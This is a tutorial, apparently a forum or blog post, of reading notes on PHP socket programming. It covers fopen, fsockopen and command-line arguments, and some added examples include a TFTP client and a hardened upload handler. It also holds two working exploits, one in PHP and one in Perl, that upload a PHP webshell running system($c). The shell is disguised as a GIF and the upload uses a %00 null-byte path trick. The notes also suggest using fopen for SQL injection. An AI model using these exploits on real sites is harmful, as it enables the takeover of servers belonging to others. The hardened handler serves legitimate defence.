I have been studying PHP for about a month and have learned quite a lot. Unlike most people, though, what I like best about PHP is its socket side, so I decided to write a series of PHP socket reading notes, going from the basics up to socket_raw.
Examples plus experience. The examples will include port forwarding (getting through a firewall), an exploit for a dynamic web script, a port scanner, a PHP backdoor and a packet-based exploit framework. Because I am still studying, I can only write one article a week. I hope you will join me in PHP shell programming.
Objective:
PHP is one of the most popular scripting languages in the world and has long been widely used in web programming. What I want to say is that PHP is good not only for the web but also for the shell; it is just that people are more used to writing shell scripts in Perl. One statement up front: I am not a PHP master, I have only been in contact with PHP for a few weeks, and this is just a reading note. Please point out anything that is wrong. You can also e-mail me to discuss PHP.
Prerequisites:
The most attractive part of PHP for me is the sockets extension. I do know some VB Winsock and can write an ordinary VB Winsock program, but I chose PHP all the same, because it is cross-platform.
By default PHP does not support advanced sockets, only the "encapsulated" functions such as fsockopen. Sockets are a PHP extension, so they have to be enabled. On Windows, edit php.ini: find the line ";Windows Extensions" and remove the semicolon in front of "extension=php_sockets.dll". That's it. Under *nix, add --enable-sockets at compile time. If you do not use the dl() function, php_sockets.dll must be in the same directory as PHP. That completes the PHP socket configuration.
Now the question of how to run it.
Running a PHP script in a terminal is simple. On Windows: C:\php\php.exe -q test.php. On *nix the file should declare the PHP interpreter in advance, just as Perl does, e.g. #!/usr/local/bin/php -q, and then ./test.php. The -q parameter means that the PHP header information is not output.
The input-parameter problem:
Some people ask how a PHP shell script takes parameters. On the web you pass them as http://xxx.com/aa.php?parameter1=xxxx&parameter2=ssssss. No problem: PHP, like Perl, has equivalent parameter variables. From the official description:
$argv
The array of arguments passed to the script. When the script is run on the command line, $argv holds the C-style command-line arguments. When called via the GET method, it contains the request data.
$argc
Contains the number of command-line arguments passed to the script, when run in command-line mode.
Simple enough. Here is an example.
```php
<?php
// Expect exactly three arguments; $argc counts the script name as well
if ($argc != 4 || in_array($argv[1], array('--help', '-h', '?'))) {
    echo "by Darkness[bst]. We'll come back soon!\r\n";
    echo "------------------------------------------------\r\n";
    echo "C:/php/php.exe -q uploadexp.php http://www.bugkidz.org/upload.php filepath\r\n";
    echo "------------------------------------------------\r\n";
    exit;   // stop here instead of running on with missing arguments
}
$host = $argv[1];
$url  = $argv[2];
$path = $argv[3];
?>
```
You should be able to follow that. Note that $argv[0] refers to the program itself. You can also write printf("%s", $argv[1]);. That covers running in command-line mode; for more, see
http://www.php.net/manual/zh/features.commandline.php
1. Application of fopen
fopen can also be regarded as an encapsulated socket function: it is not only for reading and writing files, but also for sockets. fopen is the equivalent of the Inet control/class in other high-level languages and, for URLs, is more convenient than fsockopen.
How to use fopen:
$s = fopen($url, $mode);
fopen's mode parameter:
Mode  Description
'r'   Open for reading only; place the file pointer at the beginning of the file.
'r+'  Open for reading and writing; place the file pointer at the beginning of the file.
'w'   Open for writing only; place the file pointer at the beginning of the file and truncate the file to zero length. If the file does not exist, attempt to create it.
'w+'  Open for reading and writing; place the file pointer at the beginning of the file and truncate the file to zero length. If the file does not exist, attempt to create it.
'a'   Open for writing only; place the file pointer at the end of the file. If the file does not exist, attempt to create it.
'a+'  Open for reading and writing; place the file pointer at the end of the file. If the file does not exist, attempt to create it.
'x'   Create and open for writing only; place the file pointer at the beginning of the file. If the file already exists, the fopen() call fails, returns FALSE and generates an E_WARNING level error. If the file does not exist, attempt to create it. This is equivalent to specifying O_EXCL|O_CREAT for the underlying open(2) system call. This option is supported in PHP 4.3.2 and later and only works for local files.
'x+'  Create and open for reading and writing; place the file pointer at the beginning of the file. If the file already exists, the fopen() call fails, returns FALSE and generates an E_WARNING level error. If the file does not exist, attempt to create it. This is equivalent to specifying O_EXCL|O_CREAT for the underlying open(2) system call. This option is supported in PHP 4.3.2 and later and only works for local files.
That is for local files, but it can also be used over inet. Isn't that cool?
If you want to test whether a site's IIS directory has write permission, you can write it like this:
$s = fopen("http://www.bugkidz.org", "x+") or die("no write permission");
If it does, you can go on to build the following statements and write files remotely with fwrite. But the average web site is read-only.
$s = fopen("http://www.bugkidz.org/index.php?id=1", "r");
This reads the content of http://www.bugkidz.org/index.php?id=1, but the stream has to be processed to get the full contents of the file, like this:
```php
while (!feof($s)) {
    echo fgets($s, 1024);
}
```
I think fopen is the most convenient for SQL injection.
```php
function phpinet($url)
{
    $s = fopen($url, "r") or die("Open URL error");
    $cache = "";
    while (!feof($s)) {
        $cache .= fgets($s, 1024);   // accumulate the whole response, not just the last line
    }
    fclose($s);                      // close before returning; code after return never runs
    return $cache;
}
```
This function is equivalent to Inet.OpenURL in VB.
Using the fsockopen family of functions
fsockopen is also an encapsulated socket function, somewhat like the Winsock control in VB. Unfortunately it only supports active (outgoing) socket connections and does not support bind, listen and so on; if you need those, you will have to use PHP's advanced socket programming. Even so, fsockopen satisfies most requirements.
Use fsockopen like this:
resource fsockopen(string $target, int $port [, int &$errno [, string &$errstr [, float $timeout]]])
Example:
$sock = fsockopen("192.168.0.1", 80, $errno, $errstr, 30);
The first two are the address and the port, the middle two are the error variables, and the last is the timeout setting.
Usually it is just $sock = fsockopen("192.168.0.1", 80);
$sock = fsockopen("192.168.0.1", 80); is a typical TCP connection. A UDP connection looks like this:
$sock = fsockopen("udp://192.168.0.1", 53);
You can even write a TFTP client with this.
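A TFTP read in PHP, as an added example that is not part of the original article: it shows the RRQ/DATA/ACK exchange and the one edge case that matters, namely that the server answers from a new port (its transfer ID), so the example uses the sockets extension configured above rather than a connected fsockopen("udp://...") stream. The server IP and filename are placeholders.

```php
<?php
// Added example, not from the original article: a minimal TFTP read-request
// client (RFC 1350). A TFTP server answers from a fresh port (its transfer
// ID); a UDP stream from fsockopen("udp://...") is connected to port 69 and
// would discard those replies, so the sockets extension is used instead.
function tftp_get($server, $filename, $timeout = 5)
{
    $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
    if ($sock === false) return false;
    socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, array('sec' => $timeout, 'usec' => 0));
    // RRQ: opcode 1, filename, NUL, mode, NUL
    $rrq = pack('n', 1) . $filename . "\0octet\0";
    socket_sendto($sock, $rrq, strlen($rrq), 0, $server, 69);

    $data = '';
    $expected = 1;     // next block number we accept
    $tidPort = 0;      // server transfer ID, learned from the first DATA packet
    while (true) {
        $pkt = ''; $from = ''; $port = 0;
        // DATA packets are a 4-byte header plus up to 512 bytes of payload
        $n = socket_recvfrom($sock, $pkt, 516, 0, $from, $port);
        if ($n === false || $n < 4) {
            socket_close($sock);
            return false;                       // receive timeout or malformed packet
        }
        $hdr = unpack('nopcode/nblock', $pkt);
        if ($hdr['opcode'] == 5) {
            socket_close($sock);
            return false;                       // TFTP ERROR packet
        }
        if ($hdr['opcode'] != 3 || ($tidPort != 0 && $port != $tidPort) || $hdr['block'] != $expected) {
            continue;                           // other peer, duplicate or out-of-order block
        }
        $tidPort = $port;                       // lock onto the server's transfer ID
        $payload = substr($pkt, 4);
        $data .= $payload;
        socket_sendto($sock, pack('nn', 4, $hdr['block']), 4, 0, $from, $port);   // ACK
        if (strlen($payload) < 512) {
            break;                              // a short block ends the transfer
        }
        $expected++;
    }
    socket_close($sock);
    return $data;
}

// Placeholder server (TEST-NET address) and filename
$contents = tftp_get('192.0.2.10', 'boot.cfg');
echo $contents === false ? "TFTP read failed\n" : $contents;
```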
Examples of fsockopen applications:
Example one, a simple HTTP session.
Code
```php
<?php
$fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    $out  = "GET / HTTP/1.1\r\n";
    $out .= "Host: www.example.com\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>
```
The process is usually like this: create the fsockopen resource, define what to send, write it with the fwrite or fputs function, read the output line by line until end of file with fgets or fread, and close the fsockopen resource with fclose.
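The same session as a reusable function, added here as an example that is not from the original article: it adds what the bare loop above lacks, a read timeout (fsockopen's timeout only covers the connect), parsing of the status line and headers, and decoding of chunked bodies that HTTP/1.1 servers may send. The host and path are placeholders.

```php
<?php
// Added example, not from the original article: the HTTP session above wrapped
// into a function with a read timeout, status-line and header parsing and
// chunked transfer-encoding decoding. $host and $path are placeholders.
function http_get($host, $path = '/', $port = 80, $timeout = 10)
{
    $fp = fsockopen($host, $port, $errno, $errstr, $timeout);
    if (!$fp) {
        return array('error' => "$errstr ($errno)");
    }
    stream_set_timeout($fp, $timeout);    // fsockopen's timeout only covers the connect
    fwrite($fp, "GET $path HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n");
    $raw = '';
    while (!feof($fp)) {
        $raw .= fread($fp, 8192);
        $meta = stream_get_meta_data($fp);
        if ($meta['timed_out']) {
            fclose($fp);
            return array('error' => 'read timed out');
        }
    }
    fclose($fp);
    // Headers end at the first blank line; the status line looks like "HTTP/1.1 200 OK"
    list($head, $body) = explode("\r\n\r\n", $raw, 2) + array('', '');
    $lines = explode("\r\n", $head);
    $status = (int) substr(array_shift($lines), 9, 3);
    $headers = array();
    foreach ($lines as $line) {
        if (strpos($line, ':') !== false) {
            list($k, $v) = explode(':', $line, 2);
            $headers[strtolower(trim($k))] = trim($v);
        }
    }
    if (isset($headers['transfer-encoding']) && $headers['transfer-encoding'] == 'chunked') {
        $decoded = '';
        while (($pos = strpos($body, "\r\n")) !== false) {
            $len = hexdec(trim(strtok(substr($body, 0, $pos), ';')));   // size[;extensions]
            if ($len == 0) break;                           // zero-length chunk ends the body
            $decoded .= substr($body, $pos + 2, $len);
            $body = substr($body, $pos + 2 + $len + 2);     // skip the data and its CRLF
        }
        $body = $decoded;
    }
    return array('status' => $status, 'headers' => $headers, 'body' => $body);
}

$r = http_get('www.example.com');
echo isset($r['error']) ? $r['error'] . "\n" : $r['status'] . ': ' . strlen($r['body']) . " bytes\n";
```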
Angel wrote a PHP port-scanning tool, posted at
http://www.4ngel.net/article/20.htm
Choosing fsockopen to write a simple exploit-sending framework is definitely a good idea, because it's so easy.
See my exploit for a PHP upload vulnerability.
Code
```php
<?php
# codz by Darkness  Msn: cqxy[at]21cn.net
$sock = fsockopen("www.ririririri.com", 80);
if (!$sock) {
    echo "Cannot CONNECT it!";
    exit;
}
$body = "-----------------------------7d41f4a600472\r\n"
      . "Content-Disposition: form-data; name=\"path\"\r\n"
      . "\r\n"
      . "www.ppp%00\r\n"
      . "-----------------------------7d41f4a600472\r\n"
      . "Content-Disposition: form-data; name=\"image\"; filename=\"f:\\tools\\1.gif\"\r\n"
      . "Content-Type: text/plain\r\n"
      . "\r\n"
      . "<?php\r\n"
      . "system(\$c);\r\n"
      . "?>\r\n"
      . "-----------------------------7d41f4a600472--\r\n"
      . "\r\n";
$header = "POST /index.php?action=upload HTTP/1.1\r\n"
        . "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n"
        . "Referer: http://127.0.0.1/index.php?path=.\r\n"
        . "Accept-Language: zh-cn\r\n"
        . "Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472\r\n"
        . "Accept-Encoding: gzip, deflate\r\n"
        . "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n"
        . "Host: 127.0.0.1\r\n"
        . "Content-Length: " . strlen($body) . "\r\n"
        . "Connection: Keep-Alive\r\n"
        . "Cache-Control: no-cache\r\n"
        . "Cookie: PHPSESSID=111111111111111111111111\r\n"
        . "\r\n";
fputs($sock, $header);
sleep(1);
fputs($sock, $body);
while (!feof($sock)) {
    echo fgets($sock, 128);
}
fclose($sock);
?>
```
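The server side of this, added as an example that is not from the original article: an upload handler hardened against the two things the exploit above depends on, a null byte in the "path" field and a ".gif" whose bytes are really PHP. The upload directory is a placeholder and must be one the web server is configured not to execute scripts from.

```php
<?php
// Added example, not from the original article: a server-side upload handler
// hardened against what the exploit above relies on, a null byte in the
// "path" field and a ".gif" whose contents are really PHP. $uploadBase is a
// placeholder directory the web server must be configured not to execute.
function safe_upload($uploadBase, $pathField, $file)
{
    if (!isset($file['tmp_name']) || $file['error'] !== UPLOAD_ERR_OK) {
        return 'upload failed';
    }
    // Only a short, plain subdirectory name; this rules out NUL, "..", and "%00" tricks
    if (strpos($pathField, "\0") !== false || !preg_match('/^[A-Za-z0-9_\/-]{0,64}\z/', $pathField)) {
        return 'invalid path';
    }
    $base = realpath($uploadBase);
    $dir = realpath($uploadBase . '/' . $pathField);
    if ($base === false || $dir === false || strpos($dir . '/', $base . '/') !== 0) {
        return 'path escapes upload directory';
    }
    // Extension whitelist, then verify the bytes really are that image type
    $allowed = array('gif' => 'image/gif', 'jpg' => 'image/jpeg', 'png' => 'image/png');
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return 'extension not allowed';
    }
    $info = @getimagesize($file['tmp_name']);    // a text file starting with "<?php" has no image header
    if ($info === false || $info['mime'] !== $allowed[$ext]) {
        return 'not a valid ' . $ext . ' image';
    }
    if (strpos(file_get_contents($file['tmp_name']), '<?') !== false) {
        return 'embedded code rejected';          // conservative polyglot check; re-encoding with GD is stronger
    }
    // Never reuse the client's filename; pick our own and drop execute bits
    $dest = $dir . '/' . bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'could not store file';
    }
    chmod($dest, 0644);
    return 'stored as ' . basename($dest);
}

echo safe_upload(__DIR__ . '/uploads', isset($_POST['path']) ? $_POST['path'] : '',
                 isset($_FILES['image']) ? $_FILES['image'] : array());
```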
And look at Xiaolu's exploit in Perl.
Code
```perl
#!/usr/bin/perl
$| = 1;
use Socket;
$host = "127.0.0.1";
$port = "80";
$UploadTo = "";
$str = "-----------------------------7d41f4a600472\r\n"
     . "Content-Disposition: form-data; name=\"path\"\r\n"
     . "\r\n"
     . "www.ppp%00\r\n"
     . "-----------------------------7d41f4a600472\r\n"
     . "Content-Disposition: form-data; name=\"image\"; filename=\"f:\\tools\\1.gif\"\r\n"
     . "Content-Type: text/plain\r\n"
     . "\r\n"
     . "<?php\r\n"
     . "system(\$c);\r\n"
     . "?>\r\n"
     . "-----------------------------7d41f4a600472--\r\n"
     . "\r\n";
print $str;
$len = length($str);
print $len;
$req = "POST /1/1/3721/index.php?action=upload HTTP/1.1\r\n"
     . "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n"
     . "Referer: http://127.0.0.1/index.php?path=.\r\n"
     . "Accept-Language: zh-cn\r\n"
     . "Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472\r\n"
     . "Accept-Encoding: gzip, deflate\r\n"
     . "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n"
     . "Host: 127.0.0.1\r\n"
     . "Content-Length: $len\r\n"
     . "Connection: Keep-Alive\r\n"
     . "Cache-Control: no-cache\r\n"
     . "Cookie: PHPSESSID=111111111111111111111111\r\n"
     . "\r\n"
     . "$str\r\n\r\n";
print $req;
@res = sendraw($req);
print @res;
# Hmm ... maybe it can be sent another way

sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, pack "SnA4x8", 2, $port, $target)) {
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    } else {
        die("Can't connect...\n");
    }
}
```